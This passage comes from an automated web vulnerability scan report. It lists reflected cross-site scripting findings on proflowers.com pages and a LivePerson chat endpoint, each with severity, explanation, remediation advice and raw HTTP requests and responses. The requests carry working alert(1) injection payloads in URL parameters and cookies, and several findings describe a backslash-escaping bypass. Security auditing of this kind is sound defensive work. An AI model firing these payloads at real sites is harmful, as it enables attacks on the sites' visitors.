Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:20:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:20:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:20:39 GMT
Content-Length: 141634


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30003767;;;event5=1|event22=6ff98b\\";alert(1)//1f7c8e9547f|event23=0.00";
       }

   </script>
...[SNIP]...

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 6c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7 was submitted in the msessionkey parameter. This input was echoed as 6c30f<img src=a onerror=alert(1)>94c74c754a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=25522835487083372716c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7&siteContainer=STANDALONE&site=87011923&cmd=mTagKnockPage&lpCallId=264594832202-36202526651&protV=20&lpjson=1&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:11:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2960

lpConnLib.Process({"ResultSet": {"lpCallId":"264594832202-36202526651","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='87011923-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='87011923-SKEY'; lpMTagConfig.FPC_SKEY='25522835487083372716c30f<img src=a onerror=alert(1)>94c74c754a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_87011923'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1abf9\"%3balert(1)//e408dc57373 was submitted in the tile parameter. This input was echoed as 1abf9\\";alert(1)//e408dc57373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /house-plants-PBS?tile=hmpg_podA1abf9\"%3balert(1)//e408dc57373&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:16:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:16:39 GMT
Content-Length: 198580


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
nguage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:PBS";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:PBS";}s.eVar8 = "";if ("hmpg_podA1abf9\\";alert(1)//e408dc57373" != "") {s.eVar20 = "PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373_";}</script>
...[SNIP]...

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c36a\"%3balert(1)//decb137eb0b was submitted in the tile parameter. This input was echoed as 6c36a\\";alert(1)//decb137eb0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero16c36a\"%3balert(1)//decb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:09 GMT
Content-Length: 255379


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
guage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:MDF";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:MDF";}s.eVar8 = "";if ("hmpg_hero16c36a\\";alert(1)//decb137eb0b" != "") {s.eVar20 = "PFC_hmpg_hero16c36a\\";alert(1)//decb137eb0b_";}</script>
...[SNIP]...

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22db9\"%3balert(1)//18210ad228e was submitted in the tile parameter. This input was echoed as 22db9\\";alert(1)//18210ad228e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /send-flowers-bsl?tile=22db9\"%3balert(1)//18210ad228e&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:29:48 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:49 GMT
Content-Length: 247576


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
script language="JavaScript" type="text/javascript">s.pageName = "PFC:Category:bsl";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:bsl";}s.eVar8 = "";if ("22db9\\";alert(1)//18210ad228e" != "") {s.eVar20 = "PFC_22db9\\";alert(1)//18210ad228e_";}</script>
...[SNIP]...

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4f5</script><script>alert(1)</script>3d893853418 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:13:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:13:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:06 GMT
Content-Length: 143391


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
=100000;
resx.event="Product";
resx.links="30050137;5519;42864;";
resx.itemid = "30050137";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "HPC";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3cf</script><script>alert(1)</script>87e0272715b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:37:14 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:37:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:37:14 GMT
Content-Length: 138355


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30008396;5519;42864;30050137;";
resx.itemid = "30008396";
resx.qty="1";
resx.price="39.99";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aebe</script><script>alert(1)</script>f63217f9c47 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
